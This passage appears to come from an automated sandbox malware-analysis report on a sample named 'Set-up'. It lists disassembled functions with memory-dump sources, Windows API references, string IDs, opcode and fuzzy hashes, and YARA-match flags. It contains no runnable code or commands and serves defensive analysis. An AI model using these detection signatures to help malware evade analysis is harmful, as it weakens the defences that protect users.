                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+($%*+(
                                                                                                                                  • API String ID: 2994545307-3039692684
                                                                                                                                  • Opcode ID: f99d2b3151febf0e6127733f0e3f240cb989ab1c36d2aeeaba92f665993042b3
                                                                                                                                  • Instruction ID: 5838eed1f615e4fbf728dc3748efe92cd42473ddf7520a7f73600865e8e01db8
                                                                                                                                  • Opcode Fuzzy Hash: f99d2b3151febf0e6127733f0e3f240cb989ab1c36d2aeeaba92f665993042b3
                                                                                                                                  • Instruction Fuzzy Hash: 1781BE346483229FD724DF18C890A6EB7F6FF99750F14892CE9858B369DB31E851CB42
                                                                                                                                  Function 0590A400 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 907"$5
                                                                                                                                  • API String ID: 0-1990719893
                                                                                                                                  • Opcode ID: 06d45d5f16b25b40a219aa0450df60ea5d8d8e1809526f5d7a496c5a5855b5d8
                                                                                                                                  • Instruction ID: fb7c9f60bcf478c52048e176abe64338c786822e01d9b7215986d6999a14aa34
                                                                                                                                  • Opcode Fuzzy Hash: 06d45d5f16b25b40a219aa0450df60ea5d8d8e1809526f5d7a496c5a5855b5d8
                                                                                                                                  • Instruction Fuzzy Hash: 8A81F2B0508B818FE325CF3584917A3BFE2FF92304F189A6DC1EB5B282D77964068B55
                                                                                                                                  Function 05901250 Relevance: 1.7, APIs: 1, Instructions: 245comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoCreateInstance.COMBASE(059239E8,00000000,00000001,059239D8), ref: 05901279
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInstance
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                  • Opcode ID: 70737b48a3007e5c7e10f7e6d15011ca05322261c2d8baa43b7a7fb401ca46f9
                                                                                                                                  • Instruction ID: b5ddb4d5631970eca959332b9e0de97b731f042a8dca9a89365dfe8d31a5b932
                                                                                                                                  • Opcode Fuzzy Hash: 70737b48a3007e5c7e10f7e6d15011ca05322261c2d8baa43b7a7fb401ca46f9
                                                                                                                                  • Instruction Fuzzy Hash: 1F51AEB1A043049FDB20AB69CC86B7773A9FF81764F086958F945CB2D0E774E804D766
                                                                                                                                  Function 058F1AB8 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNEL32(00000001), ref: 058F1ABA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                  • Opcode ID: b2a19c74472e47e32792589084918f134f86f228a88b26d4c08199aadded6937
                                                                                                                                  • Instruction ID: 01da3f612c379aeacb84f24cc7899a90b4d11fe8aa92642a8e804797c34f8c56
                                                                                                                                  • Opcode Fuzzy Hash: b2a19c74472e47e32792589084918f134f86f228a88b26d4c08199aadded6937
                                                                                                                                  • Instruction Fuzzy Hash: BE21D2727457008FC321CF38C889B26BBE2AB96310F18856CD496DB791CB79E809C740
                                                                                                                                  Function 058F0CFC Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: dc
                                                                                                                                  • API String ID: 0-2498989246
                                                                                                                                  • Opcode ID: 874c0bd47742855c0e92b8aa0c905b498f89e59e1dd1fe337ef75556ed18f855
                                                                                                                                  • Instruction ID: b174f131b5e5eb0be53e1361a2a731f4971feccc2696c4fb082f91145eb8b66d
                                                                                                                                  • Opcode Fuzzy Hash: 874c0bd47742855c0e92b8aa0c905b498f89e59e1dd1fe337ef75556ed18f855
                                                                                                                                  • Instruction Fuzzy Hash: 0E71E37524D3028FC714CF15C9926ABBBE1EFC6214F08DA1CE4DA8B292E3789905D792
                                                                                                                                  Function 05482574 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: dc
                                                                                                                                  • API String ID: 0-2498989246
                                                                                                                                  • Opcode ID: 22b4ec63daed3ff8672710fac7c499e2c56c70f6cf8bd0eee71a7b27e1402d83
                                                                                                                                  • Instruction ID: f4b32a8f045c4503906be2fc1436755b27c79d2bd14faf77cf35f21fded5c374
                                                                                                                                  • Opcode Fuzzy Hash: 22b4ec63daed3ff8672710fac7c499e2c56c70f6cf8bd0eee71a7b27e1402d83
                                                                                                                                  • Instruction Fuzzy Hash: C471047524D3018BC714CF15C8A16AFBBE1EFC6214F08DA6CE4DA4B391E3788506D796
                                                                                                                                  Function 0591B720 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: InA>
                                                                                                                                  • API String ID: 2994545307-2903657838
                                                                                                                                  • Opcode ID: cd4405e5ebc68d3ea19338919f4fd6aaacc129df7d36a72945abe8d06dc40f32
                                                                                                                                  • Instruction ID: c455ef3fcfc9392fe393ca0636674cd7266dcb6b04b6231faeac48706d39008f
                                                                                                                                  • Opcode Fuzzy Hash: cd4405e5ebc68d3ea19338919f4fd6aaacc129df7d36a72945abe8d06dc40f32
                                                                                                                                  • Instruction Fuzzy Hash: 2581177160C3199BD724CE28C88173BBBE7FBC8724F18892DE9DA87691D735D8428B45
                                                                                                                                  Function 05911640 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0591188A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                                                                                                                  • API String ID: 0-442858466
                                                                                                                                  • Opcode ID: b645e2a4c863a0618e5cb066ceb571a191bd7e1addf97d6b756b3ab0e23b204b
                                                                                                                                  • Instruction ID: b9f715cfdfef25ecdb11baff9932cb2d5262938efbb780151ded1922a23fed7b
                                                                                                                                  • Opcode Fuzzy Hash: b645e2a4c863a0618e5cb066ceb571a191bd7e1addf97d6b756b3ab0e23b204b
                                                                                                                                  • Instruction Fuzzy Hash: D7712733F299B957CB28C93C9C512B56E535F86230B2D8B65FE728B3D5CA188805D358
                                                                                                                                  Function 059209C0 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID: %*+(
                                                                                                                                  • API String ID: 2994545307-3233224373
                                                                                                                                  • Opcode ID: fe773285dd6e614433dfca09a36de037f09aea8bfa2326f49be642acbece0302
                                                                                                                                  • Instruction ID: 658ddc6c88be15c826d24e8b39c6dda459e2a65ae4aa5babe7f1eb352a69fd98
                                                                                                                                  • Opcode Fuzzy Hash: fe773285dd6e614433dfca09a36de037f09aea8bfa2326f49be642acbece0302
                                                                                                                                  • Instruction Fuzzy Hash: B931E63435A310AFE7208E14DC8DF3BBBAAFB85714F68492CF58657189D260AC508655
                                                                                                                                  Function 058EC180 Relevance: .8, Instructions: 843COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d8ef2529f96809b19b1413aeab3ef5f05fe8a830e5db1553fa6a68ad972e1ab4
                                                                                                                                  • Instruction ID: 03fafed8933108001c9b205d3142a5131b3ef7c9e371a67803ab0e01b0c79c96
                                                                                                                                  • Opcode Fuzzy Hash: d8ef2529f96809b19b1413aeab3ef5f05fe8a830e5db1553fa6a68ad972e1ab4
                                                                                                                                  • Instruction Fuzzy Hash: 8442B132A087158BC725DF28D88167AB3F2FFC6315F158A2DDD96D7281E734AC518B82
                                                                                                                                  Function 058FE2D0 Relevance: .8, Instructions: 770COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: afdf1bcf9e70543a0f77e1fb6b9271418bda2bdcfb65a389072b417937841910
                                                                                                                                  • Instruction ID: 21a0e3becc32513e6fc2c3ec996ce12c38040785e376920c7b0a770748de9dd5
                                                                                                                                  • Opcode Fuzzy Hash: afdf1bcf9e70543a0f77e1fb6b9271418bda2bdcfb65a389072b417937841910
                                                                                                                                  • Instruction Fuzzy Hash: 99725CB1418B829ED3618F3DC845783FFE9AB5A320F184A5ED0FA87392C7756105CB62
                                                                                                                                  Function 058FCF70 Relevance: .7, Instructions: 708COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 19aa032fcd7ea6aa6e44321dd9969020886aa13d37dee0af4581cbc0f142a49f
                                                                                                                                  • Instruction ID: 97d30c0c45c081817be10b00bdb76aaf1933c407bad91512e59c522c8c944733
                                                                                                                                  • Opcode Fuzzy Hash: 19aa032fcd7ea6aa6e44321dd9969020886aa13d37dee0af4581cbc0f142a49f
                                                                                                                                  • Instruction Fuzzy Hash: 7F32AFB16093449FE724CF15D885B6BBBE2FBC8704F14891CEA899B291D735EC01CB92
                                                                                                                                  Function 058EB670 Relevance: .7, Instructions: 670COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a7cdd89607bb83f585804e6672836a0293a8c522c4e47b5cd654e2931230c37d
                                                                                                                                  • Instruction ID: aa68fc7440d2b6b1897acb3c553c4a7b2e3a59d69780cbf4d2f0ef5f1fdcda56
                                                                                                                                  • Opcode Fuzzy Hash: a7cdd89607bb83f585804e6672836a0293a8c522c4e47b5cd654e2931230c37d
                                                                                                                                  • Instruction Fuzzy Hash: F052C770A087849FEB35CB24C4857A7BBF2BB42315F14482DD9E786B82C379AD85CB51
                                                                                                                                  Function 058E7FD0 Relevance: .6, Instructions: 612COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d47136a8b18e242b102edffef0ed0af83461eb2e82c1e980cbf108ef85e63996
                                                                                                                                  • Instruction ID: f1385bc9a7da69816050db0745be5adaddfbff768cbd3cc7cf868bdc10b40efa
                                                                                                                                  • Opcode Fuzzy Hash: d47136a8b18e242b102edffef0ed0af83461eb2e82c1e980cbf108ef85e63996
                                                                                                                                  • Instruction Fuzzy Hash: 5E421170614B108FC368CF29C59052ABBF2BB46714B944A2EDAA78BF90D736F845CF14
                                                                                                                                  Function 058EA5F0 Relevance: .5, Instructions: 459COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fcc242ccc775558139f23c4381e86e539602ee281ae36f54741a0a5ecdb75772
                                                                                                                                  • Instruction ID: 6bca447f2534c0f9f80c1283c8e53f73fb2c61db2433d9e79c9887d7545da017
                                                                                                                                  • Opcode Fuzzy Hash: fcc242ccc775558139f23c4381e86e539602ee281ae36f54741a0a5ecdb75772
                                                                                                                                  • Instruction Fuzzy Hash: 12F1AD756083418FD728CF29C88166BFBE6BFDA200F08882DE8D5C7751E639E944CB52
                                                                                                                                  Function 059014B0 Relevance: .4, Instructions: 431COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 22f0bfba31a734ca7278d6fa84c49d951fe95b99fa740cfeb11139cac7585667
                                                                                                                                  • Instruction ID: ce67bb7da3cbb36c8fa06cb59bc34ec31534ce67c6783ece869eb33e4d2b33bb
                                                                                                                                  • Opcode Fuzzy Hash: 22f0bfba31a734ca7278d6fa84c49d951fe95b99fa740cfeb11139cac7585667
                                                                                                                                  • Instruction Fuzzy Hash: D5B10272A082109FD7249B28CC91B7B73E6FF85354F09582DE8869B2D1E7789D40D792
                                                                                                                                  Function 05492D28 Relevance: .4, Instructions: 431COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e84e9e364182dd15bbe6aac3830e6c05f1869a173cf30154bbe8c790fed6ecd0
                                                                                                                                  • Instruction ID: abd11758ec5e64ddcc6426452cfbe709f61b27c8acd198942dcd46e321908d38
                                                                                                                                  • Opcode Fuzzy Hash: e84e9e364182dd15bbe6aac3830e6c05f1869a173cf30154bbe8c790fed6ecd0
                                                                                                                                  • Instruction Fuzzy Hash: 63B13A72A083109BDF18DF24C892BBB77E5FF82310F09496EE8869B394E7759905C752
                                                                                                                                  Function 054975D8 Relevance: .4, Instructions: 390COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d90ac60bc0d140b6ecc7a2c2dd39d2abf086d270ed26b402527b1a8e3b9c8ec7
                                                                                                                                  • Instruction ID: 91573cb74e2851ed212adc4e46d109fefc60bb5bf024a23faa31b7e621cf8e46
                                                                                                                                  • Opcode Fuzzy Hash: d90ac60bc0d140b6ecc7a2c2dd39d2abf086d270ed26b402527b1a8e3b9c8ec7
                                                                                                                                  • Instruction Fuzzy Hash: 18A12B716183419BEF18CF2888926FB7FD2EF97210F14457EE8868B391E234E906C795
                                                                                                                                  Function 058EB1E0 Relevance: .3, Instructions: 303COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d1d9c54743ab109cd481749becd5064847d31783dabe9adf18ed4a31d7fe10f4
                                                                                                                                  • Instruction ID: c05b6059953e64258f40e2383ab6e6444c0b99c5642cfb66963b6a9c2b0e1cd6
                                                                                                                                  • Opcode Fuzzy Hash: d1d9c54743ab109cd481749becd5064847d31783dabe9adf18ed4a31d7fe10f4
                                                                                                                                  • Instruction Fuzzy Hash: 23C16BB2A487418FC320CF68CC86BABB7F1BF85318F08492DD5D9C6242E778A555CB46
                                                                                                                                  Function 00F04620 Relevance: .3, Instructions: 302COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9d480ad416ac0570ef7a4c7c3aa173e4941ddd788d4c3e87038de4745b172ab5
                                                                                                                                  • Instruction ID: ed0d2681e722a9704f5b450010046b0f92d5b4e80ef4af5e8b328e533a4879e5
                                                                                                                                  • Opcode Fuzzy Hash: 9d480ad416ac0570ef7a4c7c3aa173e4941ddd788d4c3e87038de4745b172ab5
                                                                                                                                  • Instruction Fuzzy Hash: F8D11870610515ABC70ACF1DD495AF9B7F0FB48309F8182AEEA46E7385C738B925DB90
                                                                                                                                  Function 00F04A60 Relevance: .3, Instructions: 302COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f4ea4abbf94fd750a623faf1f6e1dd6ed191fea393cf66eab837ac8f44a29871
                                                                                                                                  • Instruction ID: d5994bef4c5d6e474197f2e073da4d1ad1d7f9d95bfe98aafb611b793d835de6
                                                                                                                                  • Opcode Fuzzy Hash: f4ea4abbf94fd750a623faf1f6e1dd6ed191fea393cf66eab837ac8f44a29871
                                                                                                                                  • Instruction Fuzzy Hash: 20D11870610515ABC70ACF1DD495AF9B7F0FB48309F8182AEEA46E7385C738B925DB90
                                                                                                                                  Function 058F9BF2 Relevance: .3, Instructions: 279COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 45706e857b9c4100d8a89cd79f55dc8e0bf68388232efcd88ff6affa98231b87
                                                                                                                                  • Instruction ID: 3ff97435e4296b78a35b560df739588fdc4ea0b3ae08f3d7c4cb3aff82a915f0
                                                                                                                                  • Opcode Fuzzy Hash: 45706e857b9c4100d8a89cd79f55dc8e0bf68388232efcd88ff6affa98231b87
                                                                                                                                  • Instruction Fuzzy Hash: 778125716593409FE725CF08C4C5B7E7BA2FB98304F28491DEE828B256C6759D45CB82
                                                                                                                                  Function 058E55F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8eb59ba32e11c59fa52887d6e410879429124bd29b8c0d89caf05c0392e0e7ab
                                                                                                                                  • Instruction ID: 51a133eb6bf916dd844785defccfd8db61769a00222473aa24cad7333bde3289
                                                                                                                                  • Opcode Fuzzy Hash: 8eb59ba32e11c59fa52887d6e410879429124bd29b8c0d89caf05c0392e0e7ab
                                                                                                                                  • Instruction Fuzzy Hash: FD91B472A083558BE7258E55998032FB7E2BFA321CF19856DDC86CB252E7B0DC45C782
                                                                                                                                  Function 0590FBE0 Relevance: .2, Instructions: 247COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8cd370d2bcb852d5ad378857f36e2923feb278f10598a34f360b5f35fe4f75a6
                                                                                                                                  • Instruction ID: 0db8cb098cda20828dcd667a136bdacdd94d326ed127db82e60f89aca3b637d1
                                                                                                                                  • Opcode Fuzzy Hash: 8cd370d2bcb852d5ad378857f36e2923feb278f10598a34f360b5f35fe4f75a6
                                                                                                                                  • Instruction Fuzzy Hash: 80814733A1D5A14FD738893C5C513B9AF971B97330F2D9F69E8B58B3D6C62989028390
                                                                                                                                  Function 054A1458 Relevance: .2, Instructions: 247COMMON
